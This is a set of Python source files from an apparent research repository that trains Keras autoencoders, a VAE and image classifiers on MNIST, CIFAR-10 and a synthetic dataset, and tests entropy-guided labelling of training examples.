# Train classifiers
# ----------------------------
# Train classifier with frozen pretrained encoder
model_checkpoint = ModelCheckpoint('classifier_1.h5', monitor='val_loss', verbose=1, save_best_only=True,
mode='min')
callbacks = [early_stopping, model_checkpoint]
mnist_classifier_pretrained_e_frozen.fit(reduced_x_train, reduced_y_train,
batch_size=batch_size,
epochs=epochs,
verbose=1,
shuffle=True,
callbacks=callbacks,
validation_split=val_split)
mnist_classifier_pretrained_e_frozen.load_weights('classifier_1.h5')
score = mnist_classifier_pretrained_e_frozen.evaluate(x_test, y_test_one_hot, verbose=0)
pretrained_frozen_score += score[1]
# Train classifier with trainable pretrained encoder
model_checkpoint = ModelCheckpoint('classifier_2.h5', monitor='val_loss', verbose=1, save_best_only=True,
mode='min')
callbacks = [early_stopping, model_checkpoint]
mnist_classifier_pretrained_e_trainable.fit(reduced_x_train, reduced_y_train,
batch_size=batch_size,
epochs=epochs,
verbose=1,
callbacks=callbacks,
shuffle=True,
validation_split=val_split)
mnist_classifier_pretrained_e_trainable.load_weights('classifier_2.h5')
score = mnist_classifier_pretrained_e_trainable.evaluate(x_test, y_test_one_hot, verbose=0)
pretrained_trainable_score += score[1]
# Train classifier with randomly initialized encoder
model_checkpoint = ModelCheckpoint('classifier_3.h5', monitor='val_loss', verbose=1, save_best_only=True,
mode='min')
callbacks = [early_stopping, model_checkpoint]
mnist_classifier_random_e.fit(reduced_x_train, reduced_y_train,
batch_size=batch_size,
epochs=epochs,
verbose=1,
callbacks=callbacks,
shuffle=True,
validation_split=val_split)
mnist_classifier_random_e.load_weights('classifier_3.h5')
score = mnist_classifier_random_e.evaluate(x_test, y_test_one_hot, verbose=0)
random_score += score[1]
# Record average classification accuracy for each no. of labelled examples
classifier_pretrained_frozen_acc[index] = 100 * pretrained_frozen_score / num_iterations
classifier_pretrained_trainable_acc[index] = 100 * pretrained_trainable_score / num_iterations
classifier_random_acc[index] = 100 * random_score / num_iterations
# Print accuracies of classifiers on full training set
print('Classifer Accuracies\n')
print('Frozen Pretrained Encoder + FC Layers: ' + str(classifier_pretrained_frozen_acc[-1]) + '%')
print('Trainable Pretrained Encoder + FC Layers: ' + str(classifier_pretrained_trainable_acc[-1]) + '%')
print('Randomly Initialized Encoder + FC Layers: ' + str(classifier_random_acc[-1]) + '%')
# Save results to file
np.savetxt('classifier1.txt', classifier_pretrained_frozen_acc, fmt='%f')
np.savetxt('classifier2.txt', classifier_pretrained_trainable_acc, fmt='%f')
np.savetxt('classifier3.txt', classifier_random_acc, fmt='%f')
# =====================================
# Visualize results
# =====================================
# Plot comparison graph
plt.plot(num_unlabelled, classifier_pretrained_frozen_acc, '-o', num_unlabelled, classifier_pretrained_trainable_acc,
'-o', num_unlabelled, classifier_random_acc, '-o')
plt.title('Test Accuracy vs No. of Labelled Examples used for Training')
plt.ylabel('Test Accuracy (%)')
plt.xlabel('No. of labelled examples')
plt.legend(['Frozen Pretrained Encoder', 'Trainable Pretrained Encoder', 'Randomly Initialized Encoder'], loc='lower right')
plt.grid()
plt.savefig('cifar10_classifier_num_labels_compar.png')
# Plot for frozen pretrained network
plt.plot(num_unlabelled, classifier_pretrained_frozen_acc, '-o')
plt.title('Test Accuracy vs No. of Labelled Examples used for Training (Frozen Pretrained E')
plt.ylabel('Test Accuracy (%)')
plt.xlabel('No. of labelled examples')
plt.grid()
plt.savefig('cifar10_pretrained_frozen_acc.png')
# Plot for trainable pretrained network
plt.plot(num_unlabelled, classifier_pretrained_trainable_acc, '-o')
plt.title('Test Accuracy vs No. of Labelled Examples used for Training (Trainable Pretrained E)')
plt.ylabel('Test Accuracy (%)')
plt.xlabel('No. of labelled examples')
plt.grid()
plt.savefig('cifar10_pretrained_trainable_acc.png')
# Plot for supervised network
plt.plot(num_unlabelled, classifier_random_acc, '-o')
plt.title('Test Accuracy vs No. of Labelled Examples used for Training (Random E')
plt.ylabel('Test Accuracy (%)')
plt.xlabel('No. of labelled examples')
plt.grid()
plt.savefig('cifar10_random_acc.png') | {"/latent_space_visualization/synthetic_dataset/sd_vae_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_ce_train.py": ["/functions/data_funcs.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/cifar10_cnn/cifar10_lr_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/mnist_mlp/mnist_basic_ae_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/mnist_mlp/mnist_vae_train.py": ["/functions/data_funcs.py", "/functions/visualization_funcs.py", "/functions/auxiliary_funcs.py", "/common_models/common_models.py"], "/train_models/cifar10_cnn/cifar10_ce_train.py": ["/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_classifier_comparison.py": ["/common_models/classifier_models.py", "/common_models/common_models.py", "/functions/data_funcs.py"], "/semi_supervised/augmentation/cifar10_bigan_aug_comparison.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_bigan_deterministic_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_dae_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_ls_interpolations.py": ["/common_models/common_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_plot_recons.py": ["/common_models/common_models.py", "/functions/data_funcs.py"], "/train_models/mnist_mlp/mnnist_classifier_comparison.py": ["/common_models/common_models.py", "/functions/data_funcs.py", "/common_models/classifier_models.py"], "/train_models/mnist_mlp/mnist_plot_recons.py": ["/functions/data_funcs.py"], "/semi_supervised/bigan/cifar10_bigan_comparison.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_vae_train.py": ["/functions/data_funcs.py", "/functions/visualization_funcs.py", "/functions/auxiliary_funcs.py", "/common_models/common_models.py"], "/latent_space_visualization/synthetic_dataset/sd_sae_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/semi_supervised/labelling_algorithm/cifar10_guided_labelling.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/latent_space_visualization/synthetic_dataset/sd_lr_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_aae_train.py": ["/common_models/common_models.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py", "/functions/auxiliary_funcs.py"], "/train_models/mnist_mlp/mnist_lr_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/latent_space_visualization/synthetic_dataset/sd_gan_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/cifar10_cnn/cifar10_aae_train.py": ["/common_models/common_models.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py", "/functions/auxiliary_funcs.py"]} |
53,504 | davidhayes3/ME-Project | refs/heads/master | /train_models/cifar10_cnn/cifar10_vae_train.py | from __future__ import print_function
import numpy as np
from functions.data_funcs import get_cifar10
from functions.visualization_funcs import plot_train_loss, plot_train_accuracy, save_reconstructions
from functions.auxiliary_funcs import save_models
from cifar10_models import vae_encoder_model, generator_model
from common_models.common_models import vae_model, vae_encoder_sampling_model
from keras import backend as K
from keras import metrics
from keras.models import Model
from keras.layers import Input, Lambda
from keras.callbacks import EarlyStopping, TensorBoard, ModelCheckpoint
# Set random seed for reproducibility
np.random.seed(12345)
# =====================================
# Define constants
# =====================================
img_rows = 32
img_cols = 32
channels = 3
img_shape = (img_rows, img_cols, channels)
latent_dim = 64
num_classes = 10
epsilon_std = 0.05
image_path = 'Images/cifar10_vae'
model_path = 'Models/cifar10_vae'
# =====================================
# Load dataset
# =====================================
(X_train, y_train), (X_test, y_test) = get_cifar10()
# =====================================
# Instantiate and compile models
# =====================================
# Instantiate models
encoder = vae_encoder_model()
generator = generator_model()
# Define sampling function
def sampling(args):
z_mean, z_log_var = args
epsilon = K.random_normal(shape=(K.shape(z_mean)[0], latent_dim),
mean=0., stddev=epsilon_std)
return z_mean + K.exp(z_log_var / 2) * epsilon
# Define VAE model
x = Input(shape=img_shape)
z_mean, z_log_var = encoder(x)
z = Lambda(sampling, output_shape=(latent_dim,))([z_mean, z_log_var])
recon_x = generator(z)
vae = Model(x, recon_x)
# Define VAE loss and compile model
xent_loss = np.prod(img_shape) * K.mean(metrics.binary_crossentropy(x, recon_x))
kl_loss = - 0.5 * K.sum(1 + z_log_var - K.square(z_mean) - K.exp(z_log_var), axis=-1)
vae_loss = K.mean(xent_loss + kl_loss)
vae.add_loss(vae_loss)
vae.compile(optimizer='rmsprop', loss=None)
# =====================================
# Train models
# =====================================
# Specify training hyper-parameters
epochs = 100
batch_size = 128
patience = 10
# Specify callbacks for training
early_stopping = EarlyStopping(monitor='val_loss', min_delta=0, patience=patience, verbose=0, mode='auto')
model_checkpoint = ModelCheckpoint(filepath=model_path+'.h5', monitor='val_loss', verbose=1, save_best_only=True,
mode='min')
callbacks = [early_stopping, model_checkpoint]
# Train model
history = vae.fit(X_train,
epochs=epochs,
batch_size=batch_size,
shuffle=True,
callbacks=callbacks,
validation_split=1/10.)
# Replace current encoder and generator models with that from the saved best autoencoder
vae_encoder = vae_encoder_model()
encoder = vae_encoder_sampling_model(vae_encoder, latent_dim, img_shape, epsilon_std)
generator = generator_model()
vae = vae_model(encoder, generator, img_shape)
vae.load_weights(model_path + '.h5')
# Save encoder and decoder models
save_models(path=model_path, encoder=encoder, generator=generator)
# =====================================
# Visualizations
# =====================================
# Save reconstructions of test images
save_reconstructions(image_path, num_classes, X_test, y_test, generator, encoder, img_rows, img_cols, channels, color=True)
# Plot training curves
plot_train_loss(image_path, history) | {"/latent_space_visualization/synthetic_dataset/sd_vae_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_ce_train.py": ["/functions/data_funcs.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/cifar10_cnn/cifar10_lr_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/mnist_mlp/mnist_basic_ae_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/mnist_mlp/mnist_vae_train.py": ["/functions/data_funcs.py", "/functions/visualization_funcs.py", "/functions/auxiliary_funcs.py", "/common_models/common_models.py"], "/train_models/cifar10_cnn/cifar10_ce_train.py": ["/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_classifier_comparison.py": ["/common_models/classifier_models.py", "/common_models/common_models.py", "/functions/data_funcs.py"], "/semi_supervised/augmentation/cifar10_bigan_aug_comparison.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_bigan_deterministic_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_dae_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_ls_interpolations.py": ["/common_models/common_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_plot_recons.py": ["/common_models/common_models.py", "/functions/data_funcs.py"], "/train_models/mnist_mlp/mnnist_classifier_comparison.py": ["/common_models/common_models.py", "/functions/data_funcs.py", "/common_models/classifier_models.py"], "/train_models/mnist_mlp/mnist_plot_recons.py": ["/functions/data_funcs.py"], "/semi_supervised/bigan/cifar10_bigan_comparison.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_vae_train.py": ["/functions/data_funcs.py", "/functions/visualization_funcs.py", "/functions/auxiliary_funcs.py", "/common_models/common_models.py"], "/latent_space_visualization/synthetic_dataset/sd_sae_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/semi_supervised/labelling_algorithm/cifar10_guided_labelling.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/latent_space_visualization/synthetic_dataset/sd_lr_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_aae_train.py": ["/common_models/common_models.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py", "/functions/auxiliary_funcs.py"], "/train_models/mnist_mlp/mnist_lr_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/latent_space_visualization/synthetic_dataset/sd_gan_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/cifar10_cnn/cifar10_aae_train.py": ["/common_models/common_models.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py", "/functions/auxiliary_funcs.py"]} |
53,505 | davidhayes3/ME-Project | refs/heads/master | /functions/auxiliary_funcs.py |
# Function to save models
def save_models(path, encoder=None, generator=None):
if encoder is not None:
encoder.save_weights(path + '_encoder.h5')
if generator is not None:
generator.save_weights(path + '_generator.h5') | {"/latent_space_visualization/synthetic_dataset/sd_vae_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_ce_train.py": ["/functions/data_funcs.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/cifar10_cnn/cifar10_lr_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/mnist_mlp/mnist_basic_ae_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/mnist_mlp/mnist_vae_train.py": ["/functions/data_funcs.py", "/functions/visualization_funcs.py", "/functions/auxiliary_funcs.py", "/common_models/common_models.py"], "/train_models/cifar10_cnn/cifar10_ce_train.py": ["/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_classifier_comparison.py": ["/common_models/classifier_models.py", "/common_models/common_models.py", "/functions/data_funcs.py"], "/semi_supervised/augmentation/cifar10_bigan_aug_comparison.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_bigan_deterministic_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_dae_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_ls_interpolations.py": ["/common_models/common_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_plot_recons.py": ["/common_models/common_models.py", "/functions/data_funcs.py"], "/train_models/mnist_mlp/mnnist_classifier_comparison.py": ["/common_models/common_models.py", "/functions/data_funcs.py", "/common_models/classifier_models.py"], "/train_models/mnist_mlp/mnist_plot_recons.py": ["/functions/data_funcs.py"], "/semi_supervised/bigan/cifar10_bigan_comparison.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_vae_train.py": ["/functions/data_funcs.py", "/functions/visualization_funcs.py", "/functions/auxiliary_funcs.py", "/common_models/common_models.py"], "/latent_space_visualization/synthetic_dataset/sd_sae_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/semi_supervised/labelling_algorithm/cifar10_guided_labelling.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/latent_space_visualization/synthetic_dataset/sd_lr_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_aae_train.py": ["/common_models/common_models.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py", "/functions/auxiliary_funcs.py"], "/train_models/mnist_mlp/mnist_lr_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/latent_space_visualization/synthetic_dataset/sd_gan_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/cifar10_cnn/cifar10_aae_train.py": ["/common_models/common_models.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py", "/functions/auxiliary_funcs.py"]} |
53,506 | davidhayes3/ME-Project | refs/heads/master | /latent_space_visualization/synthetic_dataset/sd_sae_train.py | from __future__ import print_function, division
import numpy as np
from keras.callbacks import EarlyStopping, ModelCheckpoint
from sd_models import sparse_encoder_model, generator_model
from common_models.common_models import autoencoder_model
from functions.auxiliary_funcs import save_models
from functions.visualization_funcs import save_reconstructions, save_latent_vis, plot_train_accuracy, plot_train_loss
# Set random seed for reproducibility
np.random.seed(12345)
# =====================================
# Define constants
# =====================================
img_dim = 4
img_rows = 2
img_cols = 2
channels = 1
img_shape = (img_rows, img_cols, channels)
latent_dim = 2
num_classes = 16
image_path = 'Images/sd_sae'
model_path = 'Models/sd_sae'
# =====================================
# Load dataset
# =====================================
# Load dataset
X_train = np.loadtxt('Dataset/synthetic_dataset_x_train.txt', dtype=np.float32)
X_test = np.loadtxt('Dataset/synthetic_dataset_x_test.txt', dtype=np.float32)
y_train = np.loadtxt('Dataset/synthetic_dataset_y_train.txt', dtype=np.int)
y_test = np.loadtxt('Dataset/synthetic_dataset_y_test.txt', dtype=np.int)
# Reshape to image format
X_train = X_train.reshape(X_train.shape[0], img_rows, img_cols, channels)
X_test = X_test.reshape(X_test.shape[0], img_rows, img_cols, channels)
# =====================================
# Instantiate and compile models
# =====================================
# Instantiate models
generator = generator_model()
encoder = sparse_encoder_model()
autoencoder = autoencoder_model(encoder, generator)
autoencoder.compile(optimizer='adadelta', loss='binary_crossentropy', metrics=['accuracy'])
# =====================================
# Train models
# =====================================
# Specify hyper-parameters for training
epochs = 100
batch_size = 128
patience = 10
# Specify callbacks for training
early_stopping = EarlyStopping(monitor='val_loss', min_delta=0, patience=patience, verbose=0, mode='auto')
model_checkpoint = ModelCheckpoint(model_path + '.h5', monitor='val_loss', verbose=1, save_best_only=True, mode='min')
callbacks = [early_stopping, model_checkpoint]
# Train model
history = autoencoder.fit(X_train, X_train,
epochs=epochs,
batch_size=batch_size,
shuffle=True,
validation_data=(X_test, X_test),
callbacks=callbacks,
verbose=1)
# Replace current encoder and decoder models with that from the best save autoencoder
encoder = sparse_encoder_model()
decoder = generator_model()
autoencoder = autoencoder_model(encoder, decoder)
autoencoder.load_weights(model_path + '.h5')
# Save encoder and decoder models
save_models(path=model_path, encoder=encoder, generator=generator)
# =====================================
# Visualizations
# =====================================
# Save reconstructions of test images
save_reconstructions(image_path, num_classes, X_test, y_test, generator, encoder, img_rows, img_cols, channels, color=False)
# Save latent space visualization
save_latent_vis(image_path, X_train, y_train, encoder, num_classes)
# Plot loss curves
plot_train_accuracy(image_path, history)
plot_train_loss(image_path, history) | {"/latent_space_visualization/synthetic_dataset/sd_vae_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_ce_train.py": ["/functions/data_funcs.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/cifar10_cnn/cifar10_lr_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/mnist_mlp/mnist_basic_ae_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/mnist_mlp/mnist_vae_train.py": ["/functions/data_funcs.py", "/functions/visualization_funcs.py", "/functions/auxiliary_funcs.py", "/common_models/common_models.py"], "/train_models/cifar10_cnn/cifar10_ce_train.py": ["/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_classifier_comparison.py": ["/common_models/classifier_models.py", "/common_models/common_models.py", "/functions/data_funcs.py"], "/semi_supervised/augmentation/cifar10_bigan_aug_comparison.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_bigan_deterministic_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_dae_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_ls_interpolations.py": ["/common_models/common_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_plot_recons.py": ["/common_models/common_models.py", "/functions/data_funcs.py"], "/train_models/mnist_mlp/mnnist_classifier_comparison.py": ["/common_models/common_models.py", "/functions/data_funcs.py", "/common_models/classifier_models.py"], "/train_models/mnist_mlp/mnist_plot_recons.py": ["/functions/data_funcs.py"], "/semi_supervised/bigan/cifar10_bigan_comparison.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_vae_train.py": ["/functions/data_funcs.py", "/functions/visualization_funcs.py", "/functions/auxiliary_funcs.py", "/common_models/common_models.py"], "/latent_space_visualization/synthetic_dataset/sd_sae_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/semi_supervised/labelling_algorithm/cifar10_guided_labelling.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/latent_space_visualization/synthetic_dataset/sd_lr_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_aae_train.py": ["/common_models/common_models.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py", "/functions/auxiliary_funcs.py"], "/train_models/mnist_mlp/mnist_lr_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/latent_space_visualization/synthetic_dataset/sd_gan_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/cifar10_cnn/cifar10_aae_train.py": ["/common_models/common_models.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py", "/functions/auxiliary_funcs.py"]} |
53,507 | davidhayes3/ME-Project | refs/heads/master | /semi_supervised/labelling_algorithm/cifar10_guided_labelling.py | from sklearn.metrics import confusion_matrix
from train_models.cifar10_cnn.cifar10_models import deterministic_encoder_model
from common_models.classifier_models import classifier_e_frozen_model, classifier_e_trainable_model
from keras.callbacks import EarlyStopping, ModelCheckpoint
from functions.data_funcs import get_cifar10
import numpy as np
import keras
import itertools
import matplotlib.pyplot as plt
# Set random seed for reproducibility
np.random.seed(12345)
# =====================================
# Define constants
# =====================================
num_classes = 10
initial_num_labels = 1000
init_num_labels_per_class = int(initial_num_labels / num_classes)
pretrained_encoder_classifier_path = 'cifar10_pretrained_encoder_cnn.h5'
fully_supervised_classifier_path = 'cifar10_fully_supervised_cnn.h5'
# =====================================
# Load dataset
# =====================================
# Load CIFAR-10 data
(X_train, y_train), (X_test, y_test) = get_cifar10()
y_test_one_hot = keras.utils.to_categorical(y_test, num_classes)
# =====================================
# Instantiate and compile models
# =====================================
# Instantiate and load pre-trained encoder
pretrained_encoder = deterministic_encoder_model()
pretrained_encoder.load_weights('cifar10_bigan_determ_encoder.h5')
pretrained_encoder.trainable = False
# Instanatiate random encoder
random_encoder = deterministic_encoder_model()
# Instantiate classifiers
pretrained_classifier = classifier_e_frozen_model(pretrained_encoder)
fully_supervised_classifier = classifier_e_trainable_model(random_encoder)
# Compile classifiers
pretrained_classifier.compile(loss='categorical_crossentropy',
optimizer='adadelta',
metrics=['accuracy'])
fully_supervised_classifier.compile(loss='categorical_crossentropy',
optimizer='adadelta',
metrics=['accuracy'])
# =====================================
# Set parameters for labeling algorithm
# =====================================
num_labels_added_per_iter = 1000
# Compute maximum number of iterations for algorithm (full training set is labelled)
max_num_iterations = np.int(X_train.shape[0] / (2 * num_labels_added_per_iter))
# Create arrays to hold number of labels
pretrained_num_labels = np.zeros(max_num_iterations)
fully_num_labels = np.zeros(max_num_iterations)
# Create arrays to record performacnce of classifiers
pretrained_acc = np.zeros(max_num_iterations, dtype=np.float32)
fully_supervised_acc = np.zeros(max_num_iterations, dtype=np.float32)
# Create vector with name of all classes
classes = np.arange(num_classes)
# =====================================
# Generate initial training set for classifier
# =====================================
# Get initial data examples to train on
indices_initial = np.empty(0)
# Modify training set to contain set number of labels for each class
for class_index in range(num_classes):
# Generate training set with even class distribution over all labels
indices = [i for i, y in enumerate(y_train) if y == classes[class_index]]
indices = np.asarray(indices)
indices = indices[0:init_num_labels_per_class]
indices_initial = np.concatenate((indices_initial, indices))
# Sort indices so class examples are mixed up
indices_initial = np.sort(indices_initial)
indices_initial = indices_initial.astype(np.int)
# Reduce training vectors
x_train_initial = X_train[indices_initial]
y_train_initial = y_train[indices_initial]
# Convert label vectors to one-hot vectors
y_train_initial = keras.utils.to_categorical(y_train_initial, num_classes)
y_test_one_hot = keras.utils.to_categorical(y_test, num_classes)
# =====================================
# Train classifiers with initial dataset
# =====================================
# Set training hyper-parameters
epochs = 100
batch_size = 128
patience = 5
val_split = 1/10.
# Specify callbacks for training
early_stopping = EarlyStopping(monitor='val_loss', min_delta=0, patience=patience, verbose=0, mode='auto')
# ----------------------------
# Train classifier with pre-trained encoder
# ----------------------------
# Specify callbacks
model_checkpoint = ModelCheckpoint(pretrained_encoder_classifier_path, monitor='val_loss', verbose=1,
save_best_only=True, mode='min')
pretrained_callbacks = [early_stopping, model_checkpoint]
# Train classifier
pretrained_classifier.fit(x_train_initial, y_train_initial,
batch_size=batch_size,
epochs=epochs,
verbose=1,
callbacks=pretrained_callbacks,
shuffle=True,
validation_split=val_split)
# Load weights of best classifier
pretrained_classifier.load_weights(pretrained_encoder_classifier_path)
# Compute and print test accuracy of model
score = pretrained_classifier.evaluate(X_test, y_test_one_hot, verbose=0)
pretrained_acc[0] = 100 * score[1]
print('Pretrained Encoder Classifier: Overall test accuracy (%) with ' + str(init_num_labels_per_class) + ' labeled examples per class: '
+ str(pretrained_acc[0]))
pretrained_num_labels[0] = initial_num_labels
# ----------------------------
# Train fully supervised classifier
# ----------------------------
# Specify callbacks
model_checkpoint = ModelCheckpoint(fully_supervised_classifier_path, monitor='val_loss', verbose=1,
save_best_only=True, mode='min')
fully_supervised_callbacks = [early_stopping, model_checkpoint]
# Train classifier
fully_supervised_classifier.fit(x_train_initial, y_train_initial,
batch_size=batch_size,
epochs=epochs,
verbose=1,
callbacks=fully_supervised_callbacks,
shuffle=True,
validation_split=val_split)
# Load weights of best classifier
fully_supervised_classifier.load_weights(fully_supervised_classifier_path)
# Compute and print test accuracy of model
score = fully_supervised_classifier.evaluate(X_test, y_test_one_hot, verbose=0)
fully_supervised_acc[0] = 100 * score[1]
print('Fully Supervised Classifier: Overall test accuracy (%) with ' + str(init_num_labels_per_class) + ' labeled examples per class: '
+ str(fully_supervised_acc[0]))
fully_num_labels[0] = initial_num_labels
# =====================================
# Guided labelling for pretrained classifier
# =====================================
# Create unlabelled and labelled set
x_train_unlabelled = X_train
y_train_unlabelled = y_train
x_train_labelled = np.empty([0, 32, 32, 3])
y_train_labelled = np.empty([0, 1])
# Loop until test accuracy does not improve with additional examples
for iteration in range(1, max_num_iterations):
print('\nIteration ' + str(iteration + 1) + '\n')
if iteration == 2:
y_train_labelled = y_train_labelled.reshape((y_train_labelled.shape[0],))
# Calculate entropy of classifier for all examples in unlabelled set
predictions = pretrained_classifier.predict(x_train_unlabelled)
x_train_unlabelled_entropy = (-predictions * np.log2(predictions)).sum(axis=1)
# Find indices of examples with 1000 highest entropy in unlabelled set
max_entropy_indices = x_train_unlabelled_entropy.argsort()[-num_labels_added_per_iter:][::-1]
# Add these examples to labelled set and remove from unlabelled set
x_train_labelled = np.concatenate((x_train_labelled, x_train_unlabelled[max_entropy_indices]))
y_train_labelled = np.concatenate((y_train_labelled, y_train_unlabelled[max_entropy_indices]))
y_train_labelled_one_hot = keras.utils.to_categorical(y_train_labelled, num_classes)
x_train_unlabelled = np.delete(x_train_unlabelled, max_entropy_indices, axis=0)
y_train_unlabelled = np.delete(y_train_unlabelled, max_entropy_indices)
# Train classifier
print('Training on ' + str(len(x_train_labelled)) + ' newest most confusing examples\n')
# Randomly initializae CNN
pretrained_classifier = classifier_e_frozen_model(pretrained_encoder)
# Train CNN
pretrained_classifier.fit(x_train_labelled, y_train_labelled_one_hot,
batch_size=batch_size,
epochs=epochs,
verbose=1,
shuffle=True,
callbacks=pretrained_callbacks,
validation_split=val_split)
pretrained_classifier.load_weights(pretrained_encoder_classifier_path)
# Update and print test accuracy
score = pretrained_classifier.evaluate(X_test, y_test_one_hot, verbose=0)
pretrained_acc[iteration] = 100 * score[1]
pretrained_num_labels[iteration] = x_train_labelled.shape[0]
print('Test accuracy with ' + str(len(x_train_labelled)) + ' most confusing examples labelled: '
+ str(pretrained_acc[iteration]) + '%\n')
# =====================================
# Guided labelling for fully supervised classifier
# =====================================
